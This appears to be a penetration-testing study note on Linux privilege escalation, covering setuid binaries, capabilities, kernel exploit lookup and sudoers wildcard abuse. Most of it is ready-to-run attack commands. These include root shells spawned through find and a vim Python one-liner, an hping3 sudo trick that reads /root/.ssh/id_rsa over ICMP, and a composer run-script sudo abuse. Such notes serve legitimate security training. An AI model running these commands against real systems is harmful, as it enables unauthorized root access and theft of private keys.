x

Insecure System Components

18.7.1 - Abusing Setuid Binaries and Capabilities

If a program is open in memory, we'll be able to see it and find the PID with ps 

ps u -C passwd

We can inspect the real and effective UID assigned to the process by inspecting the proc pseudo-file system 

grep Uid /proc/1932/status

Inspecting passwds process credentials (this is the bash process for a user we're interested in) 

cat /proc/1131/status | grep Uid

We can see if a process has the suid binary, passwd generally has it set 

ls -asl /usr/bin/passwd

Execute a bash shell using find, which was found to have the suid binary set as a misconfiguration 

find /home/joe/Desktop -exec "/usr/bin/bash" -p \;

Manually enumerating binaries capabilities by recursively searching the root folder 

/usr/sbin/getcap -r / 2>/dev/null

After finding potentially vulnerable binaries with the suid bit set, check GTFO bins for exploitation - https://gtfobins.github.io/

Annoying SUID Binaries

There is an annoying vim suid binary that is finnicky but does work, just don't give up on it if you see vim has the suid bit set. What a surprise right? Vim being awkward and difficult? Noooooo not vim, vim is perfect anything else is for casuals.
https://gtfobins.github.io/gtfobins/vim/ 

/usr/bin/vim.basic -c ':py3 import os; os.setuid(0); os.execl("/bin/bash", "/bin/bash")'

Another one is sudoers access to the hping3 binary. it also requires a specific command/wildcard access as well as a way to spawn 2 fully interactive terminals.
https://medium.com/@haadimdwork/icmp-walkthrough-proving-grounds-92b43fa18823 

sudo hping3 --icmp 127.0.0.1 -d 100 --sign signature --file /root/.ssh/id_rsa

/var/www/html/mon$ sudo hping3 --icmp 127.0.0.1 --listen signature --safe

18.7.2 - Exploiting kernel vulnerabilities

Kernels are the core of any OS. Think of them as a layer between application software and the actual computer hardware. The kernel has complete control over the OS, exploiting this can result in root user execution.

Gather information about the target 

cat /etc/issue

Inspect the kernel version and system architecture 

uname -a

uname -r

arch

We can use SearchSploit among other tools to look for exploits matching our kernel versions as well as our distribution name and version 

searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation"   | grep  "4." | grep -v " < 4.4.0" | grep -v "4.8"

Another, arguably better tool is the linux-exploit-suggester-2.
Provide it with the kernel version when running. 

./linux-exploit-suggester-2.pl -k 2.6.32

18.7.3 - Sudoers wildcard argument exploitation

An incorrectly placed wildcard could allow for adding arguments to an existing sudoers command, resulting in potential privesc.

In this example, a configuration file in the working directory includes a php file for the composer binary that has a script function that can be called on, write access to this php file allows for adding our own arbitrary script, a revshell, rootbash, sudoers edit, etc. 

User skunk may run the following commands on debian: (ALL : ALL) ALL (root) NOPASSWD: /usr/bin/composer --working-dir\=/var/www/html/lavita *

sudo /usr/bin/composer --working-dir=/var/www/html/lavita run-script x
Left-click: follow link, Right-click: select node, Scroll: zoom
x